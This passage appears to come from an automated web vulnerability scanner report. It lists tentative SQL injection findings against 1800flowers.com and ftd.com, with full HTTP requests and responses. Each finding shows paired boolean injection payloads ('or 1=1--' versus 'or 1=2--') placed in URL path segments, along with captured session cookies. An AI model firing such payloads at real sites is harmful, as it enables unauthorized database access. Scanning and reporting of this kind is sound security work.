Request 2

GET /checkoutsignin.do HTTP/1.1
Host: ww30.1800flowers.com
Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q='%20and%201%3d2--%20
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; JSESSIONID=0000Fep_6e7sSO_rh0rC-n3Lun2:-1; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.5.10.1304902847; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|5|0|0|0|1|0|1|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902956353&t2=1304902961198&t3=1304902969048&t4=1304902955083&lti=1304902969048&ln=&hr=javascript%3AsetEvent%28shipping%2CshoppingBasketForm%29&fti=1304902969061&fn=searchform%3A0%3BshoppingBasketForm%3A1%3BUNDEFINED%3A2%3B&ac=1:S&fd=&uer=&fu=/shoppingbasket.do&pi=o-Checkout%20-%20Shopping%20Basket%20Page&ho=blooms.1800flowers.com/cm%3F&ci=90074784

Response 2

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:16:30 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: 18FBannerCode=seogoogle; Expires=Wed, 11-May-11 01:16:30 GMT; Path=/; Domain=1800flowers.com
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 19826

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Expires" content="1">
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
<meta name="robots" content="noindex,nofollow"/>


<title>Sign In - 1-800-FLOWERS.COM</title>
<link rel="canonical" href="http://www.1800flowers.com/checkoutsignin.do" />

<link rel="shortcut icon" href="https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/images/flowers/runtime/favicon.ico" />


<link rel="stylesheet" type="text/css" href="https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/styles/flowers/flowers_enterprise_apr1.css"/>

<link rel="stylesheet" type="text/css" href="https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/styles/flowers/n-checkout_oct.css"/>

<style type="text/css">/* common.css */.trsHeader {background:#FFF url(https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/images/flowers/brandable/back2.gif) repeat-x scroll 0 0 !important;} /*newcommoncss.css*/body {/* Edit - Body BG Image & Color Hex */background: url(https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/images/flowers/spr11_bkgrnd.gif) no-repeat #ceb5dd top center !important;_background-position-y: 1px; #background-position-y: 1px;}.Container {background:#FFF url(https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/images/flowers/brandable/back2.gif) repeat-x !important;background-position:0 -1px !important;} /* Top
...[SNIP]...

1.7. http://www.ftd.com/350/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /350/favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 21285651'%20or%201%3d1--%20 and 21285651'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /35021285651'%20or%201%3d1--%20/favicon.ico HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsr.a=1304902819159; markcode=351; c1=%7B%22referrer_before_redirect%22%3A%22%22%7D

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 418
Date: Mon, 09 May 2011 01:03:44 GMT
X-Varnish: 540322091
Age: 12
Via: 1.1 varnish
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 540322091</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /35021285651'%20or%201%3d2--%20/favicon.ico HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsr.a=1304902819159; markcode=351; c1=%7B%22referrer_before_redirect%22%3A%22%22%7D

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: TLTSID=2FD5010279D810790011F758B4F4C273; Path=/; Domain=.ftd.com
Set-Cookie: TLTUID=2FD5010279D810790011F758B4F4C273; Path=/; Domain=.ftd.com; expires=Mon, 09-05-2021 01:03:44 GMT
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123189
Date: Mon, 09 May 2011 01:03:45 GMT
X-Varnish: 750145506
Age: 1
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       w
...[SNIP]...

1.8. http://www.ftd.com/350/favicon.ico [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /350/favicon.ico

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 15879274'%20or%201%3d1--%20 and 15879274'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /350/favicon.ico15879274'%20or%201%3d1--%20 HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsr.a=1304902819159; markcode=351; c1=%7B%22referrer_before_redirect%22%3A%22%22%7D

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 418
Date: Mon, 09 May 2011 01:05:27 GMT
X-Varnish: 869422801
Age: 12
Via: 1.1 varnish
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 869422801</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /350/favicon.ico15879274'%20or%201%3d2--%20 HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsr.a=1304902819159; markcode=351; c1=%7B%22referrer_before_redirect%22%3A%22%22%7D

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: TLTSID=6D8C53EC79D810790014BFC3CFF4C69A; Path=/; Domain=.ftd.com
Set-Cookie: TLTUID=6D8C53EC79D810790014BFC3CFF4C69A; Path=/; Domain=.ftd.com; expires=Mon, 09-05-2021 01:05:27 GMT
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123189
Date: Mon, 09 May 2011 01:05:28 GMT
X-Varnish: 1301387315
Age: 0
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       
...[SNIP]...

1.9. http://www.ftd.com/350/v20110407/ftd.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /350/v20110407/ftd.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 83538669'%20or%201%3d1--%20 and 83538669'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /35083538669'%20or%201%3d1--%20/v20110407/ftd.css?markcode=350&design2007=1&design_apr2008=1&popup= HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 418
Date: Mon, 09 May 2011 01:04:56 GMT
X-Varnish: 869420999
Age: 13
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 869420999</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /35083538669'%20or%201%3d2--%20/v20110407/ftd.css?markcode=350&design2007=1&design_apr2008=1&popup= HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: TLTSID=5AFF297079D8107900098B649F286376; Path=/; Domain=.ftd.com
Set-Cookie: TLTUID=5AFF297079D8107900098B649F286376; Path=/; Domain=.ftd.com; expires=Mon, 09-05-2021 01:04:56 GMT
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123303
Date: Mon, 09 May 2011 01:04:57 GMT
X-Varnish: 729980488
Age: 1
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       w
...[SNIP]...

1.10. http://www.ftd.com/350/v20110407/ftd.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /350/v20110407/ftd.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 17090585'%20or%201%3d1--%20 and 17090585'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /350/v2011040717090585'%20or%201%3d1--%20/ftd.css?markcode=350&design2007=1&design_apr2008=1&popup= HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 418
Date: Mon, 09 May 2011 01:06:47 GMT
X-Varnish: 750156685
Age: 15
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 750156685</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /350/v2011040717090585'%20or%201%3d2--%20/ftd.css?markcode=350&design2007=1&design_apr2008=1&popup= HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: TLTSID=9D1A98E479D8107900078E669A912BE0; Path=/; Domain=.ftd.com
Set-Cookie: TLTUID=9D1A98E479D8107900078E669A912BE0; Path=/; Domain=.ftd.com; expires=Mon, 09-05-2021 01:06:47 GMT
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123303
Date: Mon, 09 May 2011 01:06:48 GMT
X-Varnish: 729987039
Age: 1
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       w
...[SNIP]...

1.11. http://www.ftd.com/350/v20110407/ftd.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /350/v20110407/ftd.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 14836871'%20or%201%3d1--%20 and 14836871'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /350/v20110407/ftd.css14836871'%20or%201%3d1--%20?markcode=350&design2007=1&design_apr2008=1&popup= HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 418
Date: Mon, 09 May 2011 01:08:57 GMT
X-Varnish: 540338955
Age: 22
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 540338955</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /350/v20110407/ftd.css14836871'%20or%201%3d2--%20?markcode=350&design2007=1&design_apr2008=1&popup= HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: TLTSID=EA3EF0E879D810790009D4C6C7EFA5CB; Path=/; Domain=.ftd.com
Set-Cookie: TLTUID=EA3EF0E879D810790009D4C6C7EFA5CB; Path=/; Domain=.ftd.com; expires=Mon, 09-05-2021 01:08:57 GMT
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123303
Date: Mon, 09 May 2011 01:08:57 GMT
X-Varnish: 540340109
Age: 0
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       w
...[SNIP]...

1.12. http://www.ftd.com/351 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /351

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 12984083'%20or%201%3d1--%20 and 12984083'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /35112984083'%20or%201%3d1--%20 HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsr.a=1304902819159; markcode=351; c1=%7B%22referrer_before_redirect%22%3A%22%22%7D

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 419
Date: Mon, 09 May 2011 01:08:23 GMT
X-Varnish: 1301397318
Age: 13
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 1301397318</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /35112984083'%20or%201%3d2--%20 HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsr.a=1304902819159; markcode=351; c1=%7B%22referrer_before_redirect%22%3A%22%22%7D

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: TLTSID=D65CB5CE79D810790002C0244811241D; Path=/; Domain=.ftd.com
Set-Cookie: TLTUID=D65CB5CE79D810790002C0244811241D; Path=/; Domain=.ftd.com; expires=Mon, 09-05-2021 01:08:23 GMT
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123161
Date: Mon, 09 May 2011 01:08:25 GMT
X-Varnish: 750163468
Age: 1
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
